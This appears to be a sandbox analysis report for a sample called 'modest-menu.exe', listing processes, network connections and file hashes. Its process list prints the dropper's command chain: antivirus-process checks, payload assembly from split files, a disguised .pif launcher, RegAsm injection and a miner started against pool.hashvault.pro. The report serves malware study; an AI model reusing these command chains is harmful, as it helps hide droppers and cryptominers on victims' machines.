"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1712,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1928 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1780,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3620,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4728,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4736 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4352,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4812 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=1864 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1796,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=1576 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3536,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4476 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4756 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4620,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3700 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5100,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3460,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe

"C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" C:\Users\Admin\Desktop\modest8\modest-menu.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5119F48E14DC1A0483324D7C6CD17785 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=140E44D16C46F15B4ED298EEC2390258 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=140E44D16C46F15B4ED298EEC2390258 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A6703FFB162F90609360DFE179BD9490 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=11176BE346531F974EB594CD09AE1A05 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5252,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5444,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5420 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5588,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5620 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5748,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5216,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5012,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5348 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5248,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5744 /prefetch:8

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5360,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3692 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5320,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5440 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\ProgramData\Dllhost\dllhost.exe

C:\ProgramData\Dllhost\dllhost.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\Dllhost\winlogson.exe -c config.json

Network

Country Destination Domain Proto
GB 216.58.201.99:445 clientservices.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 216.58.212.234:443 content-autofill.googleapis.com tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
GB 20.26.156.215:443 github.com tcp
GB 104.86.110.99:443 tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
AU 40.79.173.40:443 browser.pipe.aria.microsoft.com tcp
GB 142.250.180.4:443 www.google.com udp
US 150.171.27.254:443 ax-ring.msedge.net tcp
US 13.107.138.254:443 spo-ring.msedge.net tcp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.200.14:443 clients2.google.com udp
RU 85.28.47.132:80 tcp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.200.14:443 clients2.google.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
GB 172.217.169.10:443 content-autofill.googleapis.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 140.82.112.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 142.250.180.4:443 www.google.com udp
US 216.239.38.21:443 virustotal.com tcp
US 216.239.38.21:443 virustotal.com tcp
US 74.125.34.46:443 www.virustotal.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
GB 172.217.169.67:443 recaptcha.net tcp
GB 172.217.169.67:443 recaptcha.net tcp
GB 172.217.169.10:443 content-autofill.googleapis.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 172.217.169.67:443 recaptcha.net udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 216.239.34.36:443 region1.google-analytics.com udp
GB 104.86.110.99:443 tcp
US 20.140.147.204:443 elasticafd-footprint-0d855e84-e893-47bd-84fd-b5568a836b09.azureedge.us tcp
US 8.8.8.8:53 204.147.140.20.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 254.6.107.13.in-addr.arpa udp
GB 95.101.143.219:443 r.bing.com tcp
GB 20.26.156.215:443 github.com tcp
AU 40.79.173.40:443 browser.pipe.aria.microsoft.com tcp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 oiRPkjFtLwCpOBdfUDAcXfl.oiRPkjFtLwCpOBdfUDAcXfl udp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

\??\pipe\crashpad_1144_OBCCGURXYFLKYCUX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
